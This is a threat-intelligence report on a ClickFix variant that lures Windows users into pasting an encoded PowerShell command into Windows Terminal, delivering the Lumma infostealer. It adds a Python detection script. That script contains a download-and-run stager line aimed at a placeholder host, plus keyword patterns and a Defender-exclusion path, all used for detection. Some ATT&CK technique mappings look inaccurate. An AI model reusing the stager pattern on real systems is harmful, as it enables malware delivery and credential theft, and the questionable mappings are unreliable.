Full Report
Crooks tweak familiar copy-paste ruse so that victims run malicious commands themselves

A new twist on the long-running ClickFix scam is now tricking Windows users into launching Windows Terminal and pasting malware into it themselves – handing the credential-stealing Lumma infostealer the keys to their browser vault.…
Analysis Summary
# Tool/Technique: ClickFix (Windows Terminal Variant)
## Overview
This is a social engineering technique in which attackers trick users into executing the malicious payload by hand. A fake troubleshooting or CAPTCHA verification prompt coerces the victim into pressing `Win + X -> I` to open Windows Terminal and pasting an encoded command into it. Because the command is launched from Windows Terminal rather than the Run dialog (Win + R), it sidesteps detections that key on the Run dialog, and it runs in the victim's own administrative context to deploy the Lumma Infostealer.
## Technical Details
- **Type:** Technique (Social Engineering / Human-Interactive Execution) and Malware (Lumma Stealer)
- **Platform:** Windows 10/11
- **Capabilities:** Credential theft, browser data exfiltration, defense evasion via legitimate administrative tools, and cryptocurrency wallet hijacking.
- **First Seen:** February 2024 (Current variant involving Windows Terminal)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1566.002 - Phishing: Spearphishing Link]
- **[TA0002 - Execution]**
  - [T1204.002 - User Execution: Malicious File/Command]
  - [T1059.001 - Command and Scripting Interpreter: PowerShell]
- **[TA0005 - Defense Evasion]**
  - [T1562.001 - Impair Defenses: Disable or Modify Tools (Microsoft Defender exclusions)]
  - [T1027 - Obfuscated Files or Information]
  - [T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild]
- **[TA0006 - Credential Access]**
  - [T1555.003 - Credentials from Web Browsers]
- **[TA0011 - Command and Control]**
  - [T1584.005 - Compromise Infrastructure: Botnet (Directly query blockchain)]
## Functionality
### Core Capabilities
- **Social Engineering Bypass:** Uses fake browser "verification" or "CAPTCHA" screens to provide a "Copy" button for a malicious PowerShell string.
- **Windows Terminal Exploitation:** Encourages the use of `Win + X -> I` to open Windows Terminal, which is often less scrutinized by users and some behavioral tools than the `cmd.exe` or `Run` prompt.
- **Automated Payload Fetching:** The pasted command automatically downloads auxiliary tools (like renamed 7-Zip) and compressed encrypted payloads.
- **Credential Siphoning:** Specifically targets password vaults and session cookies within Google Chrome and Microsoft Edge.
### Advanced Features
- **EtherHiding:** Utilizes cryptocurrency blockchain infrastructure to host or hide Command and Control (C2) metadata, making it difficult to block via traditional DNS/IP blacklisting.
- **Living-off-the-Land (LotL):** Employs built-in utilities like `MSBuild` and `VBScript` to execute the final infection stages.
- **Defense Impairment:** Automatically adds exclusions to Microsoft Defender to prevent the infostealer from being quarantined during its active phase.
## Indicators of Compromise
- **File Names:** Renamed 7-Zip binaries (e.g., `7z.exe` renamed to random alphanumeric strings), `fix.vbs`, `.bat` files.
- **Network Indicators:**
  - Blockchain-related traffic (queries to Ether/Smart Contracts) utilized for C2.
  - C2 Domains (Lumma specific): [defanged] `c2-domain[.]example`
- **Behavioral Indicators:**
  - `WindowsTerminal.exe` spawning `powershell.exe` with heavily Base64 encoded arguments.
  - Modification of Registry keys: `HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths`.
  - Unexpected network calls from `MSBuild.exe`.
## Associated Threat Actors
- The specific group is usually lumped in with the broader set of "ClickFix" distributors; the activity is currently associated with:
  - **Lumma (LummaC2) Operators/Affiliates**
## Detection Methods
- **Behavioral Detection:**
  - Alert on PowerShell commands containing generic keywords like `FromBase64String`, `IEX`, or `DownloadString` originating from a Windows Terminal process parent.
  - Monitor for `Win + X` shortcut sequences followed immediately by clipboard paste actions in terminal environments.
- **Signature-based detection:**
  - Scan for Lumma Stealer binary signatures in memory (Injected into `chrome.exe` or `msedge.exe`).
- **YARA Rules:**
  - Target PowerShell scripts that reference specific "ClickFix" social engineering strings (e.g., "Verification code", "Paste the command below").
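The behavioral indicators and detection methods above can be turned into a small triage script. The following is an added example, not code from the original report or from any EDR vendor: it runs over constructed process, registry and network events whose field names (`type`, `parent_image`, `image`, `command_line`, `key`, `dest_ip`) are assumptions rather than a real product schema, decodes a `-EncodedCommand` argument (Base64 over UTF-16LE, as PowerShell expects) so the `IEX`/`DownloadString` keywords can be matched inside it, and maps each hit to the ATT&CK technique the report lists. The sample stager string is a harmless stand-in pointing at a reserved `.invalid` host, and the lure-phrase scanner covers the strings quoted in the YARA guidance.

```python
"""Detection walkthrough for the ClickFix Windows Terminal variant (added example)."""
import base64
import json
import re
from pathlib import PureWindowsPath


def encode_ps(text: str) -> str:
    """Encode a string the way -EncodedCommand expects (UTF-16LE, then Base64).
    Only used here to build the constructed sample and to show the decode direction."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Harmless stand-in for a ClickFix stager: the host is a reserved .invalid name.
SAMPLE_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
TERMINAL = r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_x64\WindowsTerminal.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed telemetry, not real data; field names are assumptions
    # 0: terminal-spawned PowerShell with an encoded command (the report's key indicator)
    {"type": "process", "parent_image": TERMINAL, "image": PS,
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_ps(SAMPLE_STAGER)},
    # 1: benign interactive PowerShell from the same terminal
    {"type": "process", "parent_image": TERMINAL, "image": PS,
     "command_line": "powershell.exe -NoLogo"},
    # 2: a Defender exclusion path being written
    {"type": "registry", "image": PS,
     "key": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\x"},
    # 3: MSBuild reaching out to the network (203.0.113.0/24 is a documentation range)
    {"type": "network", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "dest_ip": "203.0.113.10", "dest_port": 443},
    # 4: benign browser traffic
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_ip": "203.0.113.11", "dest_port": 443},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
KEYWORD_RE = re.compile(r"\b(FromBase64String|IEX|Invoke-Expression|DownloadString)\b", re.I)
DEFENDER_EXCL = r"hklm\software\microsoft\windows defender\exclusions"
# Lure phrases quoted in the report's YARA guidance, plus the shortcut it describes.
LURE_RE = re.compile(r"verification code|paste the command below|win\s*\+\s*x", re.I)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def analyze_event(ev: dict) -> list:
    """Map one event to the ATT&CK techniques listed in the report, if it matches."""
    findings = []
    kind = ev.get("type")
    if kind == "process":
        if basename(ev.get("parent_image", "")) == "windowsterminal.exe" and \
                basename(ev.get("image", "")) in ("powershell.exe", "pwsh.exe"):
            cmd = ev.get("command_line", "")
            decoded = decode_encoded_command(cmd)
            # Search the plain part of the command line plus the decoded payload,
            # so keywords hidden behind Base64 are still caught.
            text = ENC_RE.sub(" ", cmd) + " " + (decoded or "")
            hits = sorted({k.lower() for k in KEYWORD_RE.findall(text)})
            if decoded is not None or hits:
                findings.append({"technique": "T1059.001", "decoded": decoded, "keywords": hits,
                                 "reason": "PowerShell under WindowsTerminal.exe with encoded/download keywords"})
    elif kind == "registry":
        if ev.get("key", "").lower().startswith(DEFENDER_EXCL):
            findings.append({"technique": "T1562.001", "reason": "Defender exclusion written",
                             "key": ev["key"]})
    elif kind == "network":
        if basename(ev.get("image", "")) == "msbuild.exe":
            findings.append({"technique": "T1127.001", "reason": "MSBuild.exe network egress",
                             "dest": f"{ev.get('dest_ip')}:{ev.get('dest_port')}"})
    return findings


def analyze(events: list) -> list:
    out = []
    for i, ev in enumerate(events):
        for f in analyze_event(ev):
            f["event_index"] = i
            out.append(f)
    return out


def lure_phrases(page_text: str) -> list:
    """Web-content side: phrases a ClickFix page typically shows the victim."""
    return sorted({m.lower() for m in LURE_RE.findall(page_text)})


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_EVENTS), indent=2))
    print(lure_phrases("Verification code: press Win + X, then I, and paste the command below."))
```

The benign interactive session (event 1) produces no finding even though its parent is also `WindowsTerminal.exe`, which is the point of decoding the argument rather than alerting on every terminal-spawned PowerShell; in production the same logic would read Sysmon Event ID 1/13/3 or the EDR's equivalent instead of the inline list.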
## Mitigation Strategies
- **User Education:** Train users to never paste "troubleshooting" or "verification" commands into Windows Terminal or PowerShell prompts from websites.
- **Technical Restrictions:** Disable or restrict PowerShell for non-administrator accounts.
- **Endpoint Protection:** Ensure EDR tools are configured to monitor and alert on suspicious child processes of `WindowsTerminal.exe` and `SystemSettings.exe`.
- **Policy:** Implement "Constrained Language Mode" for PowerShell where possible.
## Related Tools/Techniques
- **Classic ClickFix:** Uses the Win+R (Run) dialog to execute `mshta` or `cmd`.
- **ClearFake:** A predecessor technique using fake browser update prompts.
- **Lumma Stealer:** The primary payload delivered by this infection chain.